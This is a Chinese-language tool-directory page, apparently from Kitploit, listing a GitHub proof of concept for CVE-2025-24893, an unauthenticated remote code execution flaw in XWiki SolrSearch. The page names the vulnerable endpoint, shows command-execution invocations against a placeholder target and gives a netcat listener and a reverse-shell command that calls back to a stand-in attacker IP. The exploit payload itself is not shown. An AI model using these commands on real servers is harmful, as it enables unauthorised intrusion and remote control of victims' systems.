Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
xwiki_solrsearch-rce-exploit — 针对 XWiki SolrSearch 的未授权 RCE PoC (CVE-2025-24893)。命令执行 + 反弹Shell。 | Kitploit
工具/GitHubGitHub/torjan0/xwiki_solrsearch-rce-exploit
漏洞分析漏洞利用Web应用程序漏洞利用命令与控制学习与教育Payload 开发
GitHubtorjan0/xwiki_solrsearch-rce-exploit

xwiki_solrsearch-rce-exploit

针对 XWiki SolrSearch 的未授权 RCE PoC (CVE-2025-24893)。命令执行 + 反弹Shell。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
18个月前尚未审核

solrsearch-rce-exploit

针对 XWiki SolrSearch 的未授权 RCE PoC (CVE-2025-24893)。命令执行 + 反向 Shell。

CVE-2025-24893 – XWiki SolrSearch RCE PoC

针对 XWiki SolrSearch 模板注入导致未授权远程代码执行的概念验证。

已在 XWiki Debian 15.10.8(修复版本:15.10.11 / 16.4.1 / 16.5.0RC1)上测试通过。

⚠️ 仅用于教育目的。请勿在未经授权或明确许可的系统上运行。

功能

  • 通过 /xwiki/bin/get/Main/SolrSearch 发送精心构造的 Groovy 载荷。
  • 执行任意命令,并将输出以 Base64 标记包裹以便干净解码。
  • 支持使用 Java 套接字启动反向 Shell。

环境要求

  • Python 3.x
  • 使用以下命令安装依赖:
root@kitploit:~
pip install requests

使用方法

运行脚本时指定目标主机(及可选路径)。

执行基本命令:

root@kitploit:~
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "id"
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "whoami"

启动反向 Shell:

root@kitploit:~
# 在攻击者机器上
nc -lvnp 4444

# 在 PoC 中
python3 xwiki_solr_rce.py --target http://wiki.example.tld rshell <攻击者IP> 4444

备注

  • 端点:/xwiki/bin/get/Main/SolrSearch?media=rss&text=...
  • 干净的 Base64 输出确保可靠解析。
  • 最初在 HTB Editor 上演示,但适用于其他存在漏洞的实例。
  • https://nvd.nist.gov/vuln/detail/CVE-2025-24893
下载工具